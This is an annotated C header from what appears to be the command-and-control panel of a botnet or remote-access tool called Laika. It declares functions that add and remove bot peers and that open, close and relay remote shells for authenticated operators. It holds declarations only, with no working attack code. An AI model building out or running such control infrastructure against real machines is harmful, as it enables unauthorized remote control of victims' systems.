2022-02-13 00:21:59 +00:00
|
|
|
#ifndef LAIKA_CNC_PANEL_H
|
|
|
|
#define LAIKA_CNC_PANEL_H
|
|
|
|
|
2022-03-03 16:28:43 +00:00
|
|
|
#include "cnc.h"
|
2022-02-13 00:21:59 +00:00
|
|
|
#include "lpeer.h"
|
|
|
|
|
2022-02-28 22:27:55 +00:00
|
|
|
void laikaC_sendNewPeer(struct sLaika_peer *authPeer, struct sLaika_peer *bot);
|
|
|
|
void laikaC_sendRmvPeer(struct sLaika_peer *authPeer, struct sLaika_peer *bot);
|
|
|
|
|
2022-03-03 16:28:43 +00:00
|
|
|
void laikaC_closeAuthShell(struct sLaika_authInfo *aInfo);
|
|
|
|
void laikaC_closeBotShell(struct sLaika_botInfo *bInfo);
|
|
|
|
|
2022-02-28 22:27:55 +00:00
|
|
|
void laikaC_handleAuthenticatedHandshake(struct sLaika_peer *authPeer, LAIKAPKT_SIZE sz, void *uData);
|
|
|
|
void laikaC_handleAuthenticatedShellOpen(struct sLaika_peer *authPeer, LAIKAPKT_SIZE sz, void *uData);
|
2022-03-02 16:38:16 +00:00
|
|
|
void laikaC_handleAuthenticatedShellClose(struct sLaika_peer *authPeer, LAIKAPKT_SIZE sz, void *uData);
|
2022-02-28 22:27:55 +00:00
|
|
|
void laikaC_handleAuthenticatedShellData(struct sLaika_peer *authPeer, LAIKAPKT_SIZE sz, void *uData);
|
2022-02-13 00:21:59 +00:00
|
|
|
|
|
|
|
#endif
|